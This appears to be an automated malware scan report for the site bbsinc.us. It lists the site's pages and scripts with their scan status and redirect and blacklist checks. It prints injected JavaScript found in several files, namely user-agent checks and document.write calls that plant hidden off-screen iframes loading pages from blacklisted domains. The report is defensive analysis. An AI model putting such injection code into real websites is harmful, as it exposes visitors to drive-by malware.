Scanned pages/files
Request | Server response | Status |
http://www.bbsinc.us/ | 200 OK Content-Length: 23060 Content-Type: text/html | clean |
http://www.bbsinc.us/templates/yoo_level/lib/js/mootools/mootools-release-1.11.js | 200 OK Content-Length: 580 Content-Type: application/x-javascript | clean |
http://www.bbsinc.us/media/system/js/caption.js | 200 OK Content-Length: 0 Content-Type: application/x-javascript | clean |
http://www.bbsinc.us/modules/mod_yoo_scroller/mod_yoo_scroller.js | 200 OK Content-Length: 578 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: plarosigahyet.savannahcrimes.com
Script:
function Argisuliterkas() {
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://plarosigahyet.savannahcrimes.com/lauritosman15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterkas();
The user-agent test means the hidden iframe is written only for browsers whose user agent contains "Windows" (not at position 0) and neither "Chrome" nor "IEMobile"; other visitors receive the same file but no frame is written.
Decoded script: <iframe src="http://plarosigahyet.savannahcrimes.com/lauritosman15.html" style="position:absolute;border-style:none;left: -849px;background-color:green;top: -849px;" height="138" width="138"></iframe>
Malicious iFrame found. size: 138x138 src: http://plarosigahyet.savannahcrimes.com/lauritosman15.html
This URL is marked by Google as suspicious
<iframe src="http://plarosigahyet.savannahcrimes.com/lauritosman15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"> | ||
http://www.bbsinc.us/modules/mod_yoo_search/mod_yoo_search.js | 200 OK Content-Length: 0 Content-Type: application/x-javascript | clean |
http://www.bbsinc.us/plugins/system/yoo_effects/yoo_effects.js.php?lb=1&re=1&sl=1 | 200 OK Content-Length: 2165 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
Script:
function Grandarium() {
var soset = navigator.userAgent; var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1); if (!unicode) { document.write('<iframe src="http://duislow.voiceofpalmsprings.com/nuniojetos15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>'); } } Grandarium();
The user-agent test means the off-screen iframe is written only for browsers whose user agent contains "Windows" (not at position 0) and neither "Chrome" nor "IEMobile".
Antivirus reports:
| ||
http://www.bbsinc.us/templates/yoo_level/lib/js/addons/base.js | 200 OK Content-Length: 583 Content-Type: application/x-javascript | clean |
http://www.bbsinc.us/templates/yoo_level/lib/js/addons/accordionmenu.js | 200 OK Content-Length: 1433 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
Script (excerpt as shown by the scanner):
var YOOAccordionMenu = new Class({
initialize: function(togglers, elements, options) { this.setOptions({ accordion: 'default' }, options); this.togs = togglers; this.elms = elements; switch(this.options.accordion) { case 'slide': this.createSlide(); break; default: this.createDefault(); } }, createDefault: function() { var options = {}; if (!(tog.hasClass('active') || this.options.display == 'all' || this.options.display == i)) { fx.hide(); } span.addEvent('click', function(){ fx.toggle(); }); }.bind(this)); } }); YOOAccordionMenu.implement(new Options);
Appended directly after the library code:
document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://mwancv.ddns.name/e5043c703de0ea57a.ebLoZqL?14" height="499"
Antivirus reports:
| ||
http://www.bbsinc.us/templates/yoo_level/lib/js/addons/fancymenu.js | 200 OK Content-Length: 0 Content-Type: application/x-javascript | clean |
http://www.bbsinc.us/templates/yoo_level/lib/js/addons/dropdownmenu.js | 200 OK Content-Length: 570 Content-Type: application/x-javascript | clean |
http://www.bbsinc.us/templates/yoo_level/lib/js/yoo_tools.js | 200 OK Content-Length: 0 Content-Type: application/x-javascript | clean |
http://www.bbsinc.us/wthvideo/wthvideo.js | 200 OK Content-Length: 570 Content-Type: application/x-javascript | clean |
http://www.bbsinc.us/index.php?option=com_contact&view=contact&id=1&Itemid=125 | 200 OK Content-Length: 16144 Content-Type: text/html | clean |
http://www.bbsinc.us/media/system/js/validate.js | 200 OK Content-Length: 4397 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
Script (excerpt as shown by the scanner):
var JFormValidator = new Class({ initialize: function() { this.handlers = Object(); this.custom = Object(); this.setHandler('username', function (value) { regex = new RegExp("[\<|\>|\"|\'|\%|\;|\(|\)|\&]", "i"); return !regex.test(value); } ); this.setHandler('password', function (value) { regex=/^\S[\S ]{2,98}\S$/; return regex.test(value); } ); this.setHandler('numeric $(el.labelref).addClass('invalid'); } } else { el.removeClass('invalid'); if (el.labelref) { $(el.labelref).removeClass('invalid'); } } } }); document.formvalidator = null; Window.onDomReady(function(){ document.formvalidator = new JFormValidator(); });
Appended directly after the library code (the same iframe source as in accordionmenu.js above):
document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://mwancv.ddns.name/e5043c703de0ea57a.ebLoZqL?14" height="499" width="499"
Antivirus reports:
| ||
http://www.bbsinc.us/index.php?option=com_content&view=article&id=116&Itemid=124 | 200 OK Content-Length: 17391 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bbsinc.us
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: bbsinc.us
Referer: http://www.google.com/search?q=bbsinc.us
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
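Query: http://www.google.com/safebrowsing/diagnostic?site=bbsinc.us
Result: This site is not currently listed as suspicious.
Note that this lookup covers bbsinc.us itself; the iframe URL found in mod_yoo_scroller.js is reported separately in the scan table above as marked suspicious by Google.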
Query: http://yandex.com/infected?l10n=en&url=http://bbsinc.us/
Result: bbsinc.us is not infected or malware details are not published yet.